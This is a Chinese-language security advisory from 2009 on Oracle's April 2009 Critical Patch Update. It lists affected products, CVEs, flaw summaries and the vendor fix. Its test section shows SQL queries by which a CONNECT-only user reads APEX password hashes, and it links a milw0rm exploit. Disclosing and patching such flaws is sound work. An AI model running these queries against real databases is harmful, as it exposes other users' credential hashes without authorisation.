安全研究
安全漏洞
Oracle 2009年4月紧急补丁更新修复多个漏洞
发布日期:2009-04-09
更新日期:2009-04-16
受影响系统:
Oracle Application Server 10.1.2.3.0描述:
Oracle E-Business Suite 12.0.6
Oracle E-Business Suite 11.5.10.2
Oracle Database 9.2.0.8DV
Oracle Database 9.2.0.8
Oracle Database 11.1.0.7
Oracle Database 11.1.0.6
Oracle Database 10.2.0.4
Oracle Database 10.2.0.3
Oracle Database 10.1.0.5
Oracle PeopleSoft Enterprise PeopleTools 8.49
Oracle WebLogic Server 9.2
Oracle WebLogic Server 9.1 GA
Oracle WebLogic Server 9.0 GA
Oracle WebLogic Server 8.1
Oracle WebLogic Server 7.0
Oracle WebLogic Server 10.3
Oracle PeopleSoft Enterprise HRMS 9.0
Oracle PeopleSoft Enterprise HRMS 8.9
Oracle Outside In SDK HTML Export 8.3.0
Oracle Outside In SDK HTML Export 8.2.2
Oracle XML Publisher 5.6.2
Oracle XML Publisher 10.1.3.2.1
Oracle XML Publisher 10.1.3.2
Oracle BI Publisher 10.1.3.4
Oracle BI Publisher 10.1.3.3.3
Oracle BI Publisher 10.1.3.3.2
Oracle BI Publisher 10.1.3.3.1
Oracle BI Publisher 10.1.3.3.0
Oracle WebLogic Portal 8.1
Oracle Data Service Integrator 10.3.0
Oracle AquaLogic Data Services Platform 3.2
Oracle AquaLogic Data Services Platform 3.0.1
Oracle AquaLogic Data Services Platform 3.0
Oracle JRockit R27.6.2
BUGTRAQ ID: 34461,34994
CVE(CAN) ID: CVE-2009-0974,CVE-2009-0983,CVE-2009-0989,CVE-2009-0990,CVE-2009-0993,CVE-2009-0994,CVE-2009-0996,CVE-2009-1008,CVE-2009-1009,CVE-2009-1010,CVE-2009-1011,CVE-2009-1017,CVE-2009-0995,CVE-2009-0999,CVE-2009-1000,CVE-2009-1001,CVE-2009-1002,CVE-2009-1003,CVE-2009-1004,CVE-2009-1005,CVE-2009-1006,CVE-2009-1012,CVE-2009-1016,CVE-2009-0972,CVE-2009-0973,CVE-2009-0975,CVE-2009-0976,CVE-2009-0977,CVE-2009-0978,CVE-2009-0979,CVE-2009-0980,CVE-2009-0981,CVE-2009-0984,CVE-2009-0985,CVE-2009-0986,CVE-2009-0988,CVE-2009-0991,CVE-2009-0992,CVE-2009-0997,CVE-2009-0982,CVE-2009-0998,CVE-2009-1013,CVE-2009-1014,CVE-2009-0189,CVE-2009-0190
Oracle Database是一款商业性质大型数据库系统。
Oracle发布了2009年4月的紧急补丁更新公告,修复了多个Oracle产品中的多个漏洞。这些漏洞影响Oracle产品的所有安全属性,可导致本地和远程的威胁。其中一些漏洞可能需要各种级别的授权,但也有些不需要任何授权。最严重的漏洞可能导致完全入侵数据库系统。
1) Oracle进程管理器和通知(opmn)守护程序中存在格式串错误,远程攻击者可以通过向6000/TCP端口提交特制的POST请求导致执行任意代码。
2) 由于没有正确地过滤对DBMS_AQIN软件包所传送的输入,远程攻击者可以通过提交恶意的查询请求执行SQL注入攻击。
3) Oracle数据库所捆绑的Application Express组件中的错误可能允许非特权用户泄露LOWS_030000.WWV_FLOW_USER中的APEX口令哈希。
4) 远程攻击者可以通过向WebLogic Server插件提交恶意的HTTP请求触发堆溢出。
5) WebLogic Server插件在解析SSL证书时存在栈溢出漏洞。
<*来源:Esteban Martinez Fayo
Joxean Koret (joxeankoret@yahoo.es)
Dyon Balding
链接:http://secunia.com/advisories/34730/
http://secunia.com/advisories/34693/
http://secunia.com/advisories/34074/
http://secunia.com/secunia_research/2009-22/
http://secunia.com/secunia_research/2009-23/
http://marc.info/?l=bugtraq&m=123974320524359&w=2
http://www.red-database-security.com/advisory/oracle_sql_injection_dbms_aqadm_sys.html
http://www.red-database-security.com/advisory/oracle_sql_injection_dbms_aqin.html
http://www.red-database-security.com/advisory/apex_password_hashes.html
http://www.oracle.com/technology/deploy/security/wls-security/1001.html?_template=/ocom/print
http://www.oracle.com/technology/deploy/security/wls-security/1002.html?_template=/ocom/print
http://www.oracle.com/technology/deploy/security/wls-security/1003.html?_template=/ocom/print
http://www.oracle.com/technology/deploy/security/wls-security/1004.html
http://www.oracle.com/technology/deploy/security/wls-security/1005.html
http://www.oracle.com/technology/deploy/security/wls-security/1006.html?_template=/ocom/print
http://www.oracle.com/technology/deploy/security/wls-security/1012.html?_template=/ocom/print
http://www.oracle.com/technology/deploy/security/wls-security/1016.html?_template=/ocom/print
http://marc.info/?l=bugtraq&m=125123607405965&w=2
http://marc.info/?l=bugtraq&m=125147728029102&w=2
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html?_template=/o
http://www.us-cert.gov/cas/techalerts/TA09-105A.html
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=801
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=800
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=799
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=798
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Connected to:
Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options
SQL> select granted_role from user_role_privs;
GRANTED_ROLE
------------------------------
CONNECT
SQL> select owner,table_name from all_tables where owner='FLOWS_030000';
OWNER TABLE_NAME
------------------------------ ------------------------------
FLOWS_030000 WWV_FLOW_DUAL100
FLOWS_030000 WWV_FLOW_LOV_TEMP
FLOWS_030000 WWV_FLOW_TEMP_TABLE
Get a list of all columns containing the string "%PASSWORD%'
SQL> select owner||'.'||table_name||'.'||column_name from all_tab_columns where column_name like '%PASSWORD%' and owner like '%FLOWS_0300%';
OWNER||'.'||TABLE_NAME||'.'||COLUMN_NAME
--------------------------------------------------------------------------------
FLOWS_030000.WWV_FLOW_USERS.CHANGE_PASSWORD_ON_FIRST_USE
FLOWS_030000.WWV_FLOW_USERS.FIRST_PASSWORD_USE_OCCURRED
FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD_RAW
FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD2
FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD
FLOWS_030000.WWV_FLOW_USERS.PASSWORD_LIFESPAN_DAYS
FLOWS_030000.WWV_FLOW_USERS.PASSWORD_LIFESPAN_ACCESSES
FLOWS_030000.WWV_FLOW_USERS.PASSWORD_ACCESSES_LEFT
FLOWS_030000.WWV_FLOW_USERS.PASSWORD_DATE
9 rows selected.
SQL> select user_name,web_password2 from FLOWS_030000.WWV_FLOW_USERS
USER_NAME WEB_PASSWORD2
--------------------------------------------------------------------------------
YURI 141FA790354FB6C72802FDEA86353F31
http://www.milw0rm.com/exploits/8507
建议:
厂商补丁:
Oracle
------
Oracle已经为此发布了一个安全公告(cpuapr2009)以及相应补丁:
cpuapr2009:Oracle Critical Patch Update Advisory - April 2009
链接:http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html?_template=/o
浏览次数:4706
严重程度:0(网友投票)
绿盟科技给您安全的保障